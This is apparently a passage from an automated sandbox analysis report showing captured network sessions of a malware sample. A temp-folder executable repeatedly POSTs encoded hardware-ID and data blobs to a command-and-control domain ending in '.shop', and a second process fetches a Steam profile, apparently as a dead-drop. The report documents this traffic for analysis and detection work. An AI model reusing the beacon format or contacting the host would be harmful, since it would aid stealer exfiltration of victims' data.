                                                                              Data Ascii: p4S0T0dGzcAiA7SfgRXIwJIwIkUByz8h46Mh9ZSfFQeiV/IeR4QclvECdt4C1ksCETJw19HIOfI0sqiwlF7UF+QFNsyHxExBYJFmz0MS2pUAe/SV0sspNiY1ebKXTABHp0d1T4ZETELgQHfeAtbOARByNtIRyLhy9XMostYdlpa1l+RPgFcakOpCdJUDEhqEw/WiV1La7yH18eswlxzX12dFNs4HhQ/EYcK2nkLXCwKQMDPXU4q7MCWgubKSTAB
                                                                              2024-05-26 08:22:36 UTC1369INData Raw: 6c 70 56 31 77 32 45 73 52 64 68 53 39 51 42 6e 6c 62 45 5a 33 57 46 46 35 72 38 6f 65 4f 6e 75 69 4e 51 7a 41 42 48 74 45 53 77 79 73 66 48 79 51 41 77 7a 76 72 55 77 78 56 4c 77 74 52 6a 65 64 52 55 79 79 6b 69 5a 62 44 35 70 56 6f 4d 42 45 65 71 56 2b 52 49 56 6c 45 63 6a 61 48 43 39 74 36 48 55 4a 6e 49 6b 62 4a 7a 46 31 58 61 63 72 4d 77 73 76 6d 67 78 46 32 47 51 62 47 58 35 45 39 43 46 78 71 55 39 5a 65 67 43 35 63 41 33 67 54 44 39 61 4a 54 41 64 7a 74 6f 6d 57 33 75 61 56 45 54 64 61 54 49 51 58 30 69 38 61 57 77 77 39 68 78 50 59 63 67 42 53 46 44 4a 76 77 73 68 5a 53 57 6e 56 30 64 76 63 70 63 68 57 54 6d 64 51 6b 51 58 57 4e 78 38 63 63 6b 33 45 43 70 55 6c 4d 68 4e 69 54 48 36 42 69 55 49 48 63 36 54 79 31 63 4b 6f 79 6b 64 68 46 48 32 41 48
                                                                              Data Ascii: lpV1w2EsRdhS9QBnlbEZ3WFF5r8oeOnuiNQzABHtESwysfHyQAwzvrUwxVLwtRjedRUyykiZbD5pVoMBEeqV+RIVlEcjaHC9t6HUJnIkbJzF1XacrMwsvmgxF2GQbGX5E9CFxqU9ZegC5cA3gTD9aJTAdztomW3uaVETdaTIQX0i8aWww9hxPYcgBSFDJvwshZSWnV0dvcpchWTmdQkQXWNx8cck3ECpUlMhNiTH6BiUIHc6Ty1cKoykdhFH2AH
                                                                              2024-05-26 08:22:36 UTC1369INData Raw: 45 43 30 50 4d 53 64 52 77 42 31 64 71 4d 77 2b 50 30 52 6f 66 61 38 66 56 78 4d 4b 74 7a 46 4a 6d 55 6c 4f 61 41 4a 77 61 46 51 63 55 42 4a 55 4d 6c 54 4e 4c 56 57 70 55 45 59 47 4a 58 6c 5a 72 76 4a 65 45 6c 2f 4f 65 42 69 41 4c 51 64 67 49 6b 53 39 5a 52 47 42 4e 78 42 65 56 4a 55 73 55 4b 52 35 54 79 63 70 4d 52 47 7a 61 2b 66 4c 48 71 4d 70 70 65 31 64 51 6c 56 47 66 65 52 5a 63 61 6a 72 45 46 64 4a 38 44 46 38 38 48 55 62 66 33 56 31 58 4f 71 6a 64 32 63 4c 6d 67 78 46 68 55 6b 69 52 48 74 49 31 47 68 6b 31 45 38 67 66 32 6e 4e 4c 62 47 52 4d 57 59 2b 52 47 6d 51 35 39 73 6e 64 7a 61 58 62 57 6e 31 56 54 39 73 31 32 6a 63 65 4a 44 6b 4e 69 67 61 56 4d 30 74 56 61 6c 51 52 67 59 6c 65 56 6d 75 38 6c 34 53 58 38 35 34 47 49 41 74 42 32 41 69 52 4c 31
                                                                              Data Ascii: EC0PMSdRwB1dqMw+P0Rofa8fVxMKtzFJmUlOaAJwaFQcUBJUMlTNLVWpUEYGJXlZrvJeEl/OeBiALQdgIkS9ZRGBNxBeVJUsUKR5TycpMRGza+fLHqMppe1dQlVGfeRZcajrEFdJ8DF88HUbf3V1XOqjd2cLmgxFhUkiRHtI1Ghk1E8gf2nNLbGRMWY+RGmQ59sndzaXbWn1VT9s12jceJDkNigaVM0tValQRgYleVmu8l4SX854GIAtB2AiRL1
                                                                              2024-05-26 08:22:36 UTC1369INData Raw: 67 78 58 72 51 7a 78 43 4c 52 77 44 36 63 70 4d 52 47 75 71 68 38 36 4d 2f 6f 31 78 59 46 70 4b 6b 56 48 4f 64 77 42 63 4a 45 50 63 56 70 73 39 47 52 4e 79 54 41 62 42 78 46 74 45 4a 65 66 56 78 4d 71 6c 32 31 49 33 5a 32 43 78 41 39 6f 34 57 79 34 69 43 4a 41 47 31 47 5a 4a 63 7a 6f 42 56 4e 37 4f 53 6e 6b 56 30 39 62 52 33 4f 54 72 55 6d 5a 61 48 74 68 52 79 58 6c 42 58 42 55 52 6a 77 54 6e 62 51 42 48 4b 51 31 61 37 39 6c 58 55 6a 72 6a 31 35 62 54 36 4e 51 52 5a 68 6b 47 78 56 2b 52 4b 31 6c 45 63 6b 53 4b 43 4e 52 2b 42 56 41 34 48 6b 66 4d 33 31 6b 41 46 64 72 7a 33 64 69 6c 77 31 64 37 5a 32 43 68 41 4e 59 70 57 7a 6f 78 46 59 64 46 6d 7a 30 54 45 33 4a 4d 64 63 54 64 57 55 6b 74 37 34 66 4a 67 72 2b 4e 52 7a 41 42 44 64 68 52 77 33 6c 42 58 48 55
                                                                              Data Ascii: gxXrQzxCLRwD6cpMRGuqh86M/o1xYFpKkVHOdwBcJEPcVps9GRNyTAbBxFtEJefVxMql21I3Z2CxA9o4Wy4iCJAG1GZJczoBVN7OSnkV09bR3OTrUmZaHthRyXlBXBURjwTnbQBHKQ1a79lXUjrj15bT6NQRZhkGxV+RK1lEckSKCNR+BVA4HkfM31kAFdrz3dilw1d7Z2ChANYpWzoxFYdFmz0TE3JMdcTdWUkt74fJgr+NRzABDdhRw3lBXHU


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.449750188.114.96.34433192C:\Users\user\AppData\Local\Temp\F441.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:22:38 UTC290OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 18158
                                                                              Host: whispedwoodmoodsksl.shop
                                                                              2024-05-26 08:22:38 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 42 31 35 30 37 43 46 33 45 33 45 43 43 44 45 31 37 43 34 31 31 45 39 38 42 38 39 37 35 45 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62
                                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"1B1507CF3E3ECCDE17C411E98B8975E0--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                                              2024-05-26 08:22:38 UTC2827OUTData Raw: 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af 16
                                                                              Data Ascii: MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3R?l
                                                                              2024-05-26 08:22:39 UTC816INHTTP/1.1 200 OK
                                                                              Date: Sun, 26 May 2024 08:22:39 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=o8aoi8bigksem8c8u5i81n6l36; expires=Thu, 19-Sep-2024 02:09:17 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0h8cXUnz%2FFo42vTLke%2FvayRBvHL6W%2BhKIm%2B2sIpfdSdAa2eijWKkuVzhpDppAD172dgnfth7yXPdW3ctQ5II%2BlphHwWaryNym%2FZoX6W31MSyT1pkuIN8xsXzvqh3WA1WRkEWqisK3PRTXnc%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 889c5bcaa81b428b-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-05-26 08:22:39 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                                              Data Ascii: fok 8.46.123.175
                                                                              2024-05-26 08:22:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.449751188.114.96.34433192C:\Users\user\AppData\Local\Temp\F441.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:22:40 UTC289OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 8779
                                                                              Host: whispedwoodmoodsksl.shop
                                                                              2024-05-26 08:22:40 UTC8779OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 42 31 35 30 37 43 46 33 45 33 45 43 43 44 45 31 37 43 34 31 31 45 39 38 42 38 39 37 35 45 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62
                                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"1B1507CF3E3ECCDE17C411E98B8975E0--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                                              2024-05-26 08:22:41 UTC810INHTTP/1.1 200 OK
                                                                              Date: Sun, 26 May 2024 08:22:40 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=405i380i5fm68e53scjsqdmbhe; expires=Thu, 19-Sep-2024 02:09:19 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nv0I3K9hPFieosaeMe2grB4c1PPG6KfNnk%2BD4foKj8W2o2JTqXIvjs0q0rPRTnlgigOBZf1e%2FtjgCoMBICFxEulVWhWxY22WzfdV1YIXv%2BxE6fZocTTkZO2JOBrgAkmcHpiWu2S03L05p90%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 889c5bd568520c7a-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-05-26 08:22:41 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                                              Data Ascii: fok 8.46.123.175
                                                                              2024-05-26 08:22:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.449752188.114.96.34433192C:\Users\user\AppData\Local\Temp\F441.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:22:41 UTC290OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 20432
                                                                              Host: whispedwoodmoodsksl.shop
                                                                              2024-05-26 08:22:41 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 42 31 35 30 37 43 46 33 45 33 45 43 43 44 45 31 37 43 34 31 31 45 39 38 42 38 39 37 35 45 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62
                                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"1B1507CF3E3ECCDE17C411E98B8975E0--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                                              2024-05-26 08:22:41 UTC5101OUTData Raw: 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00
                                                                              Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                              2024-05-26 08:22:42 UTC816INHTTP/1.1 200 OK
                                                                              Date: Sun, 26 May 2024 08:22:42 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=k8gkfuh9iaimp82gqvg0cq05kv; expires=Thu, 19-Sep-2024 02:09:21 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LDMip76gK1acny1sHxuYDfxlh%2BL3jVg%2FDbckC5pCxjjB%2FMIoTFLnxxkW6FJTjCWWreT5li%2FY5xvlqssojeGjzxYX6wCYc7c6ndljK0FOy98hh4Vc8QYpNifFcrw5%2FKiAOm3x9%2FU6vAS26L0%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 889c5be05a831770-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-05-26 08:22:42 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                                              Data Ascii: fok 8.46.123.175
                                                                              2024-05-26 08:22:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.452653188.114.96.34433192C:\Users\user\AppData\Local\Temp\F441.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:22:43 UTC289OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 7083
                                                                              Host: whispedwoodmoodsksl.shop
                                                                              2024-05-26 08:22:43 UTC7083OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 42 31 35 30 37 43 46 33 45 33 45 43 43 44 45 31 37 43 34 31 31 45 39 38 42 38 39 37 35 45 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62
                                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"1B1507CF3E3ECCDE17C411E98B8975E0--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                                              2024-05-26 08:22:44 UTC814INHTTP/1.1 200 OK
                                                                              Date: Sun, 26 May 2024 08:22:44 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=43egko5vtqq4f1lubt6kp7k9pr; expires=Thu, 19-Sep-2024 02:09:23 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k4Xfok6ZVDPP%2Bq8ohUCxZPscEFXaap%2BEfVOZu9LDGllCyL%2BaBCJoh5M4tmb9rXM0O1F3NEpaz2NQ%2FvU8po5jfvYnIeHPUpJ8nk1JKrnkiB%2FQqrg4AJOIjnS1MlJ1QSaVlIUaMtZUZkVy0wo%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 889c5bec2d2c4265-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-05-26 08:22:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                                              Data Ascii: fok 8.46.123.175
                                                                              2024-05-26 08:22:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.452659188.114.96.34433192C:\Users\user\AppData\Local\Temp\F441.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:23:07 UTC289OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 1230
                                                                              Host: whispedwoodmoodsksl.shop
                                                                              2024-05-26 08:23:07 UTC1230OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 42 31 35 30 37 43 46 33 45 33 45 43 43 44 45 31 37 43 34 31 31 45 39 38 42 38 39 37 35 45 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62
                                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"1B1507CF3E3ECCDE17C411E98B8975E0--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                                              2024-05-26 08:23:07 UTC814INHTTP/1.1 200 OK
                                                                              Date: Sun, 26 May 2024 08:23:07 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=0o1mvoeq36c1sfia6qsrk21ter; expires=Thu, 19-Sep-2024 02:09:46 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I14rp81LFQrObk%2BsBLIIoaO4G%2B%2B63uKzAW9BXDeFbHwx9Q55otJBM1QvPfon6ne8Bux2I7vLjU87l5RDaalTlI0fc5WY2hL5qyMazRS%2FDYEjmmUhwbe7WT%2B6qoZLQrNdaOzkfboxBOGN7vc%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 889c5c7f4bc90f59-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-05-26 08:23:07 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                                              Data Ascii: fok 8.46.123.175
                                                                              2024-05-26 08:23:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.452660104.102.42.294436620C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:23:08 UTC119OUTGET /profiles/76561199689717899 HTTP/1.1
                                                                              Host: steamcommunity.com
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:08 UTC1882INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                              Cache-Control: no-cache
                                                                              Date: Sun, 26 May 2024 08:23:08 GMT
                                                                              Content-Length: 35682
                                                                              Connection: close
                                                                              Set-Cookie: sessionid=f21f9dc66fb72e205846487e; Path=/; Secure; SameSite=None
                                                                              Set-Cookie: steamCountry=US%7C493458b59285f9aa948bf050e0c9a39b; Path=/; Secure; HttpOnly; SameSite=None
